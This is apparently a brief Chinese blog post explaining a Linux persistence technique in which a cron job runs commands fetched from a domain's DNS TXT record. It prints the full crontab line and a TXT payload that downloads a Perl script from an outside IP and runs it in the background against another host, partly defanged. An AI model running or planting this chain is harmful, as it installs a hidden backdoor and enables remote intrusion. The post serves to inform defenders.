現在入侵機器後,攻擊模式越來越多元了,連要做什麼事情的程式(一般至少會寫要去哪抓程式),都不直接寫在裡面了...
使用 Cron 埋入後門 來執行 DNS 查詢的攻擊模式
平常安全性的檢查,比較不會去檢查 Cron,所以這次的攻擊手法就是把後門埋在 Cronjob 裡面,而且看起來就只是做 DNS 的查詢動作而已。
下述內容整理自此篇:Cronjob Backdoors
此攻擊手法是利用 Cronjob 埋入後門,定期依照 DNS TXT 的紀錄來遠端執行惡意程式。
手法步驟如下:
- crontab 埋入下述:
0 1 * * * /bin/sh -c "sh -c $(dig logging.chat TXT +short @pola.ns.cloudflare.com)" - 於 logging.chat 這個 Domain 的 DNS TXT 內容如下:
"wget hxxp://89(.)248(.)171(.)3/h.pl -q -O /dev/shm/h.pl&&nohup perl /dev/shm/h.pl 66.172.27.225 80&disown"
於是就會每天在 1:00 的時候,自動抓取惡意程式來執行。
![[迷你種子] µTorrent 2.0.3.20664 阿榮版 (3.0.21340 alpha)](https://i0.wp.com/technow.com.hk/wp-content/uploads/2010/08/utorrent_2010-02-05_01-150x150.png?resize=70,70 "[迷你種子] µTorrent 2.0.3.20664 阿榮版 (3.0.21340 alpha)")
